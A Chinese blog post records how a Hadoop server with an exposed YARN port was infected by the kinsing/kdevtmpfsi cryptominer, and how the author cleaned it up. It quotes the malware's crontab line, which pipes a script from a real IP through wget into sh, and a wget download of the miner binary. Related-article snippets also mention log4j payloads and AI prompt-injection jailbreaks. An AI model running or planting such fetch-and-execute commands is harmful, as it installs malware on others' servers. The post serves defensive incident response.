记录一次被挖矿僵尸攻击过程

最新推荐文章于 2024-05-03 04:03:31 发布

Ryan-Xia

最新推荐文章于 2024-05-03 04:03:31 发布

阅读量696

点赞数

分类专栏：学习笔记文章标签： hadoop hdfs

本文链接：https://blog.youkuaiyun.com/qq_36101162/article/details/105984736

版权

学习笔记专栏收录该内容

33 篇文章

订阅专栏

对病毒背景的了解来自这篇文章
https://blog.youkuaiyun.com/weixin_43970890/article/details/103857487

研究hadoop的时候提交作业到yarn上，结果8088端口开放到公网，被挖矿病毒攻击，只要一启动yarn就会执行kinsing（守护进程）以及kdevtmpfsi进程，cpu瞬间被占用到100%，服务器瘫痪。

同样的redis的6379端口也会被攻击。

查看定时命令 crontab -l
会被写入形如这样的任务

* * * * * wget -q -O - http://195.3.146.118/h2.sh | sh > /dev/null 2>&1

每分钟请求一次这个地址。

查看守护进程kinsing看到如下：

ps -ef|grep kinsing
hadoop    8768  7273  0 22:28 ?        00:00:00 wget -O /var/tmp/kinsing http://144.217.117.146/kinsing
hadoop   11306  4680  0 22:42 pts/0    00:00:00 grep --color=auto kinsing

守护进程目录：/var/tmp/kinsing
执行进程目录：/tmp/kdevtmpfsi

解决方案：

由于是云服务器，cpu占满，导致服务器无法登录，首先在云服务器安全组中，关闭对所有ip的入方向的允许（由于不是商用，写了一个当地默认IP地址）。

重启云服务器，随后进入服务器杀死kinsing和kdevtmpfsi的进程，同时进入进程目录删除kdevtmpfsi和kinsing执行文件

然后crontab -r清除定时任务。

之后再重启yarn就不会被攻击了。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Ryan-Xia

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Frog4Shell — FritzFrog 僵尸网络将一日攻击纳入其武器库

技术超强的网络安全平台

08-23

883

图 3 中所示的注入有效负载使应用程序重新连接到 FritzFrog 自己的 IP 地址 — 恶意软件托管自己的 LDAP 服务器，用于为恶意 Java 类提供服务。易受攻击的面向互联网的资产是一个严重的问题，但 FritzFrog 实际上对另一种类型的资产——内部主机构成了风险。该有效负载被易受攻击的 log4j 库错误地解析，强制 Java 应用程序连接到“attacker_address”中指定的 LDAP 服务器，从中下载 Java 类并执行它（图 2）。文件包含有关与计算机的连接的信息。

黑客大举入侵！多个WordPress插件被攻陷，流氓管理员账户横行；新型Medusa安卓木马疯狂袭击7国银行用户；Rust编写的P2PInfect僵尸网络疯狂演变 | 安全周报0628

weixin_55163056的博客

06-28

1524

该项目的原始创建者 Andrew Betts 敦促网站所有者立即删除它，并补充说“今天没有任何网站需要 polyfill[.]io 库中的任何 polyfill”，并且“添加到 Web 平台的大多数功能都很快被所有主流浏览器所采用，但也有一些例外，比如 Web Serial 和 Web Bluetooth，它们通常无法用 polyfill 实现。其中一类突出的攻击是提示注入，它指的是一种AI越狱，可用于无视大型语言模型提供商设置的路障，以防止产生攻击性、有害或非法内容，或执行违反应用程序预期用途的指令。

参与评论您还未登录，请先登录后发表或查看评论

僵尸网络攻击：从DDoS到“蜂巢网络”和“性勒索”

<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd

09-15

2700

黑客技术点击右侧关注，了解黑客的世界！Java开发进阶点击右侧关注，掌握进阶之路！Python开发点击右侧关注，探讨技术话题！作者丨Jasmine来源丨安全牛https:...

Hadoop基础之《（8）—yarn dr.who用户漏洞被挖矿》

csj50的专栏

01-31

979

dr.who用户执行了很多application，服务器被挖矿。因为yarn的8088端口REST API没有做权限控制，允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录，删除异常文件。2、检查crontab -l，删除可疑脚本。2、构建json文件。

Hadoop Yarn REST API未授权漏洞利用挖矿分析

专注于后端开发，时常接触大数据、人工智能等

01-22

2118

驱动人生挖矿木马分析与处置

beichenyyds的博客

01-11

3625

样本分析

linux 病毒自动写crontab,记一次挖矿病毒kdevtmpfsi，xmrig，定时任务crontab不能更改，及莫名的curl，致使CPU太高，占用网络链接数过大的解决办法...

weixin_30074929的博客

05-06

1033

1、警告html1、警告在linux中使用docker，redis,ssh，tomcat等的时候，建议所有更改为本身自定义的端口，开启防火墙并开发本身须要的端口。ssh2、解决病毒1.docker 引起的挖矿程序的惨案发现linux系统中使用的docker自动建立了一些镜像，而且自动建立了不少容器。docker ps查看多了一些不是工做人员建立的容器9123b9382935 fel...

2024年最新网络安全-攻击篇-攻击载体_基于人的网络安全攻击 csdn(1)

2301_77033672的博客

05-03

1257

随着网络的安全事态不断演变、新的威胁不断出现，从而也萌生了形式多样的网络攻击载体，攻击者利用这些载体进行网络安全攻击。网络安全攻击是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的任何类型的进攻动作。这些攻击可能会破坏网络系统运行的安全、信息内容的安全、信息通信与传播安全，使计算机或网络系统中的数据被篡改、窃取或丢失，导致严重的安全后果。网络安全攻击通常由黑客或其他恶意行为者发起，他们利用各种技术手段和漏洞并建立网络连接的武器载体，来实施攻击，以获得非法利益或造成损害。

僵尸网络的原理与防护问答.docx

最新发布

02-06

僵尸网络可以进行多种攻击，包括但不限于分布式拒绝服务（DDoS）攻击，数据窃取与勒索，以及广告欺诈与加密货币挖矿。DDoS攻击通过大量僵尸设备发送请求，导致目标服务瘫痪。数据窃取与勒索通过记录键盘输入、漏洞...

网络安全-攻击篇-攻击载体

qq_53439698的博客

01-06

2114

随着网络的安全事态不断演变、新的威胁不断出现，从而也萌生了形式多样的网络攻击手段。网络安全攻击是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的任何类型的进攻动作。这些攻击可能会破坏网络系统运行的安全、信息内容的安全、信息通信与传播安全，使计算机或网络系统中的数据被篡改、窃取或丢失，导致严重的安全后果。网络安全攻击通常由黑客或其他恶意行为者发起，他们利用各种技术手段和漏洞来实施攻击，以获得非法利益或造成损害。

YARN Resourcemanager引入挖矿病毒的经历

lm709409753的专栏

06-01

3414

原因由于同事为了测试方便，把YARN RM的8088对外网开放了，导致攻击者可以通过RM 的rest api直接可以提交应用。解决参考博客 https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/ 我解...

Yarn遭到挖矿病毒攻击

weixin_30485291的博客

01-16

914

测试环境在阿里云上暴露出了公网端口，前一段时间CDH集群原本是开启了Kerberos认证，但是因为大家反映使用麻烦，所以就又关闭了Kerberos。最近几天大家普遍反映测试环境上hive和hdfs job执行很慢，yarn进程的cpu使用率持续在200%以上，经过排除CPU使用率已经连续两天100%且没有降下来，查看job如下有39个job明细多余开发提交的任务数量，且User来自dr...

yarn程序被劫持运行矿机程序

capetown的博客

12-20

885

记一次问题排查过程，希望对他人有借鉴作用，不喜请喷。一、基本现象 Nodemanager进程挂掉 2、yarn日志进入系统查看yarn日志 #cd /var/log/hadoop-yarn/yarn #less yarn-yarn-nodemanager-so81.novalocal.log 发现没有异常错误信息 3、系统负载通过top 命令结合c M 查看使用cpu...

处理处理kdevtmpfsi挖矿病毒以及他的守护进程kinsing

Owen_goodman的博客

12-27

8573

服务器CPU资源占用一直处于100%的状态，检查发现是kdevtmpfsi占用导致的，此进程为挖矿程序。处理步骤如下： kdevtmpfsi 进程处理： 1、# top 查看cpu占用情况，找到占用cpu的进程最后是 kdevtmpfsi 2、# netstat -natp 根据上面的进程名查看与内网的 tcp 链接异常，看到陌生ip，查出为国外i...

阿里云服务器中挖矿病毒了，名称为 kinsing

qq_40215763的博客

05-06

4569

五一本来就没有过好，上班来了第一天同事就说页面打不开了不开心的我就打开看看项目页面，不看不要紧一看还真是见鬼了赶紧查看一下 top查看了一下 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 25638 root 10 -10 25518 ...

彻底解决 centor os kdevtmpfsi进程占用200% 导致部署应用重启

那些年我们踩过的坑

01-06

1078

网上搜索了解大概是个挖矿木马 1、top 找到主进程 2、systemctl status 主进程 3、kill -9 杀掉相关进程 4、find / -name "kdevtmpfsi" find / -name "kinsing" 删掉两个相关文件 rm -rf /tmp/kdevtmpfsi rm -rf /var/tmp/kinsing 5、netstat -natp 查...

服务器中kdevtmpfsi挖矿病毒及其解决方法